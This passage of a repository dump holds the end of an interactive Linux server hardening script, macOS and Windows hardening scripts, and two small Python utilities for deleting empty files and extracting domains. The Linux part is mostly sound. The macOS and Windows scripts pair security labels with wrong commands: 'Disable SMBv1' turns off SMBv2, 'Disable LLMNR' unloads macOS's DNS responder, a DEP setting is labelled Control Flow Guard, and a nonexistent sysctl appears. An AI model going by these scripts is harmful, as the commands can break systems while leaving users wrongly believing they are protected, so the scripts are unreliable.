mandatory access controls)? (y/n): " enable_selinux 56 | if [ "$enable_selinux" == "y" ]; then 57 | setenforce 1 58 | fi 59 | 60 | # Install and configure fail2ban 61 | read -p "Install and configure fail2ban (Protects against brute-force attacks)? (y/n): " install_fail2ban 62 | if [ "$install_fail2ban" == "y" ]; then 63 | apt-get install fail2ban 64 | cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local 65 | fi 66 | 67 | # Keep Kernel and Packages Updated 68 | read -p "Keep Kernel and Packages Updated (Ensures system components are up to date with security patches)? (y/n): " update_kernel 69 | if [ "$update_kernel" == "y" ]; then 70 | apt-get update && apt-get upgrade -y 71 | fi 72 | 73 | # Disable USB and Thunderbolt Devices 74 | read -p "Disable USB and Thunderbolt Devices (Prevents unauthorized access through physical devices)? (y/n): " disable_usb 75 | if [ "$disable_usb" == "y" ]; then 76 | echo "blacklist usb-storage" >> /etc/modprobe.d/blacklist.conf 77 | echo "blacklist thunderbolt" >> /etc/modprobe.d/blacklist.conf 78 | fi 79 | 80 | # Enforce strong password policies 81 | read -p "Enforce strong password policies (Increases password complexity to reduce the risk of unauthorized access)? (y/n): " enforce_passwords 82 | if [ "$enforce_passwords" == "y" ]; then 83 | echo "password requisite pam_pwquality.so retry=3 minlen=10 difok=3" >> /etc/pam.d/common-password 84 | fi 85 | 86 | # Restrict use of previous passwords 87 | read -p "Restrict use of previous passwords (Prevents reuse of old passwords, reducing risk of compromised credentials)? (y/n): " restrict_passwords 88 | if [ "$restrict_passwords" == "y" ]; then 89 | echo "password required pam_unix.so remember=5" >> /etc/pam.d/common-password 90 | fi 91 | 92 | # Purge Unnecessary Packages 93 | read -p "Purge Unnecessary Packages (Removes unnecessary software to minimize potential vulnerabilities)? (y/n): " purge_packages 94 | if [ "$purge_packages" == "y" ]; then 95 | apt-get autoremove -y 96 | fi 97 | 98 | # Set up password aging 99 | read -p "Set up password aging (Requires password changes at regular intervals to reduce risk of unauthorized access)? (y/n): " set_password_aging 100 | if [ "$set_password_aging" == "y" ]; then 101 | chage -M 60 "$username" 102 | fi 103 | 104 | # Disable unwanted SUID and SGID binaries 105 | read -p "Review and optionally remove SUID and SGID binaries (Identify and modify special permissions)? (y/n): " review_suid_sgid 106 | if [ "$review_suid_sgid" == "y" ]; then 107 | echo "Listing all SUID/SGID files:" 108 | files=$(find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null) 109 | select file in $files; do 110 | if [ -n "$file" ]; then 111 | read -p "Remove SUID/SGID permissions from $file? (y/n): " remove_suid_sgid 112 | if [ "$remove_suid_sgid" == "y" ]; then 113 | chmod a-s "$file" 114 | echo "Removed SUID/SGID permissions from $file." 115 | fi 116 | else 117 | echo "Invalid selection." 118 | fi 119 | echo "Select another file or press 'Ctrl+C' to exit." 120 | done 121 | fi 122 | 123 | 124 | # Logging and auditing 125 | read -p "Logging and auditing (Increases monitoring and accountability through detailed logs)? (y/n): " logging_auditing 126 | if [ "$logging_auditing" == "y" ]; then 127 | apt-get install auditd 128 | fi 129 | 130 | # Perform regular backups (manual setup required) 131 | read -p "Perform regular backups (Ensures data integrity and availability through regular backups)? (y/n): " perform_backups 132 | if [ "$perform_backups" == "y" ]; then 133 | read -p "Enter the path to the backup script (e.g., /path/to/backup/script.sh): " backup_script 134 | if [ -f "$backup_script" ]; then 135 | read -p "How often do you want to run the backups? (daily/weekly/monthly): " backup_frequency 136 | case $backup_frequency in 137 | daily) 138 | cron_time="0 0 * * *" 139 | ;; 140 | weekly) 141 | cron_time="0 0 * * 0" 142 | ;; 143 | monthly) 144 | cron_time="0 0 1 * *" 145 | ;; 146 | *) 147 | echo "Invalid selection. Please manually set up the backup schedule using crontab." 148 | exit 1 149 | ;; 150 | esac 151 | echo "Setting up $backup_frequency backups using $backup_script." 152 | (crontab -l ; echo "$cron_time $backup_script") | crontab - 153 | else 154 | echo "Backup script not found. Please ensure the path is correct." 155 | fi 156 | fi 157 | 158 | 159 | # Monitor listening network ports 160 | read -p "Monitor listening network ports (Helps in identifying potentially malicious or unnecessary open ports)? (y/n): " monitor_ports 161 | if [ "$monitor_ports" == "y" ]; then 162 | read -p "How often do you want to check the listening ports? (daily/weekly/monthly): " check_frequency 163 | case $check_frequency in 164 | daily) 165 | cron_time_ports="0 0 * * *" 166 | ;; 167 | weekly) 168 | cron_time_ports="0 0 * * 0" 169 | ;; 170 | monthly) 171 | cron_time_ports="0 0 1 * *" 172 | ;; 173 | *) 174 | echo "Invalid selection. Please manually set up the monitoring schedule using crontab." 175 | exit 1 176 | ;; 177 | esac 178 | monitoring_command="netstat -tuln > /path/to/log/directory/listening_ports.log" 179 | echo "Setting up $check_frequency port monitoring." 180 | (crontab -l ; echo "$cron_time_ports $monitoring_command") | crontab - 181 | fi 182 | 183 | echo "Server hardening completed!" 184 | -------------------------------------------------------------------------------- /scripts/security/hardening/MacSecure.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # MacSecure.sh - A script to harden the security of a MacOS system 4 | # by disabling unnecessary services and protocols, enabling security features, 5 | # and asking the user for confirmation before making any changes. 6 | 7 | echo "Disable SMBv1?" 8 | read -p "(Y/N) " input 9 | if [[ $input =~ ^[Yy]$ ]]; then 10 | sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.smbd.plist 11 | fi 12 | 13 | echo "Disable Remote Registry Service?" 14 | read -p "(Y/N) " input 15 | if [[ $input =~ ^[Yy]$ ]]; then 16 | sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.RemoteManagement.plist 17 | fi 18 | 19 | echo "Disable LLMNR?" 20 | read -p "(Y/N) " input 21 | if [[ $input =~ ^[Yy]$ ]]; then 22 | sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist 23 | fi 24 | 25 | echo "Disable NetBIOS over TCP/IP?" 26 | read -p "(Y/N) " input 27 | if [[ $input =~ ^[Yy]$ ]]; then 28 | sudo sysctl -w net.inet.tcp.msl=1000 29 | sudo sysctl -w net.inet.udp.maxdgram=576 30 | fi 31 | 32 | echo "Enable Control Flow Guard (CFG)?" 33 | read -p "(Y/N) " input 34 | if [[ $input =~ ^[Yy]$ ]]; then 35 | sudo sysctl -w kern.cfg=1 36 | fi 37 | 38 | echo "Done!" 39 | 40 | -------------------------------------------------------------------------------- /scripts/security/hardening/WinSecure.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | :SMBv1 4 | echo Disable SMBv1? (Y/N) 5 | set /p input= 6 | if /i {%input%}=={Y} ( 7 | sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi 8 | sc.exe config mrxsmb20 start= disabled 9 | ) 10 | 11 | :RemoteRegistry 12 | echo Disable Remote Registry Service? (Y/N) 13 | set /p input= 14 | if /i {%input%}=={Y} ( 15 | sc.exe config remoteregistry start= disabled 16 | ) 17 | 18 | :LLMNR 19 | echo Disable LLMNR? (Y/N) 20 | set /p input= 21 | if /i {%input%}=={Y} ( 22 | reg add "HKLM\System\CurrentControlSet\Services\LLMNR" /v "Start" /t REG_DWORD /d 0 /f 23 | ) 24 | 25 | :NetBIOS 26 | echo Disable NetBIOS over TCP/IP? (Y/N) 27 | set /p input= 28 | if /i {%input%}=={Y} ( 29 | netsh int ip set global taskoffload=disabled 30 | ) 31 | 32 | :CFG 33 | echo Enable Control Flow Guard (CFG)? (Y/N) 34 | set /p input= 35 | if /i {%input%}=={Y} ( 36 | bcdedit /set {current} nx MasOptin 37 | ) 38 | 39 | echo Done! 40 | pause 41 | -------------------------------------------------------------------------------- /scripts/utilities/CleanDir.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | #Deletes empty files in specified directory 3 | import os 4 | import sys 5 | 6 | def delete_zero_size_files(directory): 7 | for filename in os.listdir(directory): 8 | file_path = os.path.join(directory, filename) 9 | if os.path.isfile(file_path) and os.path.getsize(file_path) == 0: 10 | os.remove(file_path) 11 | print(f'Deleted zero-size file: {file_path}') 12 | 13 | def main(directory): 14 | delete_zero_size_files(directory) 15 | 16 | if __name__ == '__main__': 17 | if len(sys.argv) != 2: 18 | print("Usage: CleanDir.py ") 19 | else: 20 | main(sys.argv[1]) 21 | -------------------------------------------------------------------------------- /scripts/utilities/DomainExtractor.py: -------------------------------------------------------------------------------- 1 | import re 2 | import sys 3 | 4 | def extract_domains(filename): 5 | with open(filename, 'r') as f: 6 | text = f.read() 7 | domain_regex = r'(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]' 8 | domains = re.findall(domain_regex, text) 9 | unique_domains = list(set(domains)) 10 | return unique_domains 11 | 12 | def write_domains(filename, domains): 13 | with open(filename, 'w') as f: 14 | for domain in domains: 15 | f.write(domain + '\n') 16 | 17 | def main(input_filename, output_filename): 18 | domains = extract_domains(input_filename) 19 | write_domains(output_filename, domains) 20 | 21 | if __name__ == '__main__': 22 | if len(sys.argv) != 3: 23 | print("Usage: python DomainExtractor.py ") 24 | else: 25 | main(sys.argv[1], sys.argv[2]) 26 | --------------------------------------------------------------------------------